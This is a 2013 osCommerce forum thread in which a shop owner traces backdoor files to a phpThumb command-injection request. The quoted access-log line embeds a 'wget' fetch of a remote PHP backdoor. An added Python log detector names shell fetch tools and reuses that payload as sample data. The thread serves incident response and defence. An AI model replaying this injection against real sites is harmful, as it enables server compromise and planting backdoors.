altoid Posted April 29, 2013

This morning the site monitor on a 2.2 shop of mine showed two new files: indeks.php and indeks.php1. They were put there sometime between yesterday morning and when the site monitor cron ran this morning. They were located in the root/public_html folder, at the same level as index.php. The files contained base64 code, and upon converting it, it had something to do with email hacking, or so it appears to me. All else seems fine on that shop. I deleted those files. Googling their names didn't give me much info. Does anyone know anything about these files, etc.? Just curious. Thanks.

I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can. I remember what it was like when I first started with osC. It can be overwhelming. However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc. There are several good pros here on osCommerce. Look around, you'll figure out who they are.
Guest Posted April 29, 2013

@@altoid Secure your site! Your server, change all usernames and passwords.

Chris
Taipo Posted April 29, 2013

In many cases, those files appear via a server-wide hack (i.e. a backdoor script such as this is dropped in the root of every site on a server). Contact your web service provider and ask them whether their servers have been compromised recently. Many providers keep a tight lip on these issues and prefer to lay the blame with the user.

- Stop osCommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC: 1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
altoid Posted April 29, 2013

@@DunWeb Thanks Chris. Changed the admin user name / password, but due to a "FrontPage" extension issue the admin folder password protection is a problem; the host is working on that. First time ever this shop has been compromised. It's an older 2.2 shop and really needs to be brought up to 2.3.3. I just need to tackle that and get a more secure PHP version to cover it.

@@Taipo The host says negative on server-wide issues, but they did have a huge nasty server-wide issue a couple of years back changing all the index files to a hacked file.

Thanks
Jack_mcs Posted April 29, 2013

@@altoid FrontPage extensions are no longer supported by Microsoft, so any security issues will not be fixed. You should ask your host to remove that option. The reason you can't change the password is probably because cPanel, assuming that is what your host uses, won't let you do that if it sees something to do with FrontPage in the .htaccess file. If you delete such entries, it should work. You can then add them back in if needed.

For the index files, if it is not too late, you can look in the server's FTP log to get the IP of whoever uploaded those. Your host may have to provide the log if you don't have access to it.

Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons: Get the latest versions of my addons. Recommended SEO Addons.
altoid Posted April 29, 2013

@@Jack_mcs Jack, the particular snafu with MS FrontPage extensions, on my host anyway, is that they would not remove via the CP, nor my VPS WHM panels. Tech support had to do the removal and they just finished up, so now I can work with the protected folders in the 2.2 shops.

Good idea on the log. I will go trolling through those to see what IP might be the culprit. I have this handy add-on in this shop that will let me block that IP or an entire range with just the click of a button or two.

Thanks
Jack_mcs Posted April 30, 2013

> @@Jack_mcs Good idea on the log. I will go trolling through those to see what IP might be the culprit. I have this handy add-on in this shop that will let me block that IP or an entire range with just the click of a button or two.

LOL.
altoid Posted April 30, 2013

Reviewing the log file, the first instance of indeks.php is this:

41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"

Then later in the log there are 6 instances of GET /indeks.php from the same IP, which has now been banned from my site.

So my question is, what is the oscthumb involvement here?
Jack_mcs Posted April 30, 2013

Is file.jpg a real image? Maybe the hacker uploaded that file at some point and it has hacker code in it. You may also want to look in the Path Tracker report for that IP and see what he was doing. It might show something.
altoid Posted April 30, 2013

@@Jack_mcs Path Tracker for that IP showed this:

2013-04-28 18:37:59 product_info.php products_id=482

pid 482 is a legit product in the shop. Searching the site: no file.jpg.

Looking here: http://labs.sucuri.net/?details=picasa.com.playteck.net I find:

Details for the domain picasa.com.playteck.net
URLs and sub domains distributing the malware or acting as a redirector:
Blacklist status for picasa.com.playteck.net: http://labs.sucuri.net/?blacklist=picasa.com.playteck.net
IP address information: Domain picasa.com.playteck.net is at 67.55.40.35

IP info for that is:
IP address: 67.55.40.35
Country: CA
State/Province: ONTARIO
City: MISSISSAUGA
Zip or postal code: L4X 2Z3

I ran a site scan using sucuri.net and it came back clean. The same test through Comodo came back clean.
burt Posted April 30, 2013

Interesting. I wonder if oscthumb is vulnerable?
altoid Posted April 30, 2013

@@burt I'm running Rob's KISS thumbnailer on my 2.3.3 shops, which is where this 2.2 shop is headed.
mattjt83 Posted May 28, 2013

@@altoid @@burt It looks like oscthumb runs phpThumb, which is vulnerable. This looks like what Steve posted from the exploit on his site: http://foxtrot7security.blogspot.com/2011/12/new-attempts-to-exploit-old-phpthumb.html

I haven't tested this version but they are claiming it is updated to a more secure version of phpThumb: http://addons.oscommerce.com/info/5491

Matt
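The log line altoid posted earlier in the thread, together with mattjt83's identification of phpThumb, shows the mechanism: the value of phpThumb's fltr[] parameter is placed on an ImageMagick command line, so a ";wget ...;" inside it runs as a shell command, drops indeks.php in the web root, and the same IP then requests that file directly. The following is an added example, not code from the thread, from oscthumb or from phpThumb: a small Python detector that parses Apache combined-format access log lines, flags fltr[] values carrying shell metacharacters or download tools (phpThumb's own filter/argument separator "|", as in blur|9, is deliberately not treated as suspicious), records the URL the injected command fetched, and then flags any later request for that dropped filename. The first sample line is the one quoted in the thread; the other two lines and the address 203.0.113.7 are constructed for this example.

```python
"""Flag phpThumb fltr[] command-injection attempts in Apache combined-format access
logs and correlate them with later requests for the file the injected command fetched.
Added example for this thread; not oscthumb or phpThumb code."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# '|' is phpThumb's own filter/argument separator (blur|9), so it is NOT in this set.
SHELL_META = re.compile(r'[;&`$<>\n]')
# Tools an injected command typically uses to pull a second stage (heuristic, not exhaustive).
FETCHERS = re.compile(r'\b(wget|curl|fetch|lynx|python|perl|nc|bash)\b', re.I)
URL_RE = re.compile(r'https?://[^\s;"\']+', re.I)


def parse_line(line):
    """Parse one log line into a dict, or return None if it is not combined format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = rec.pop('request').split(' ')
    rec['method'], rec['target'] = parts[0], ' '.join(parts[1:-1])
    return rec


def query_params(target):
    """Split the query string on '&' only and percent-decode; ';' must survive as data."""
    out = []
    for pair in urlsplit(target).query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        out.append((unquote_plus(key), unquote_plus(value)))
    return out


def analyze_target(target):
    """Return (findings, fetched_urls) for one request target; findings is [] when clean."""
    findings, urls = [], []
    for key, value in query_params(target):
        base = key.split('[', 1)[0]          # 'fltr[]' -> 'fltr'
        if base == 'fltr' and (SHELL_META.search(value) or FETCHERS.search(value)):
            findings.append('fltr_injection')
            urls.extend(URL_RE.findall(value))
        elif key == 'phpThumbDebug':
            findings.append('debug_enabled')
        elif key == 'src' and re.match(r'(https?|ftp|php|data):', value, re.I):
            findings.append('remote_src')
    return findings, urls


def scan_log(lines):
    """Return alerts in log order; later hits on any dropped filename are flagged too."""
    alerts, dropped = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings, urls = analyze_target(rec['target'])
        if findings:
            alerts.append({'ip': rec['ip'], 'ts': rec['ts'], 'findings': findings,
                           'fetched': urls, 'target': rec['target']})
            for u in urls:
                name = urlsplit(u).path.rsplit('/', 1)[-1]
                if name:
                    dropped.add(name)
        path_name = urlsplit(rec['target']).path.rsplit('/', 1)[-1]
        if path_name in dropped and not findings:
            alerts.append({'ip': rec['ip'], 'ts': rec['ts'], 'findings': ['dropped_file_hit'],
                           'fetched': [], 'target': rec['target']})
    return alerts


# Sample log: line 1 is the request quoted in this thread; lines 2 and 3 are constructed
# (a normal oscthumb call, and one of the follow-up requests for the dropped file).
SAMPLE_LOG = [
    '41.151.224.2 - - [28/Apr/2013:18:38:57 -0400] "GET /oscthumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;wget%20http://picasa.com.playteck.net/indeks.php;&phpThumbDebug=9 HTTP/1.1" 200 46324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"',
    '203.0.113.7 - - [28/Apr/2013:18:40:02 -0400] "GET /oscthumb.php?src=images/widget.jpg&w=120&fltr[]=blur|2 HTTP/1.1" 200 5120 "http://shop.example/product_info.php" "Mozilla/5.0"',
    '41.151.224.2 - - [28/Apr/2013:18:41:30 -0400] "GET /indeks.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for a in scan_log(SAMPLE_LOG):
        print(a['ts'], a['ip'], a['findings'], a['fetched'] or a['target'])
```

Run against a real access_log, this reports the injection request first (with the URL it pulled), then every later GET of the dropped filename from any client, which is exactly the pair of events altoid found by hand. Treat the fetcher word list as a starting point rather than a complete filter; the shell-metacharacter check is the one that matters, because no legitimate phpThumb filter string contains a semicolon.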
altoid Posted May 28, 2013

@@mattjt83 Thanks Matt, I wasn't aware of that add-on to address the vulnerability issue. I am going to try that on an existing 2.2 shop, and then for another shop upgrade I opted to go with Robert's KISS Thumb add-on.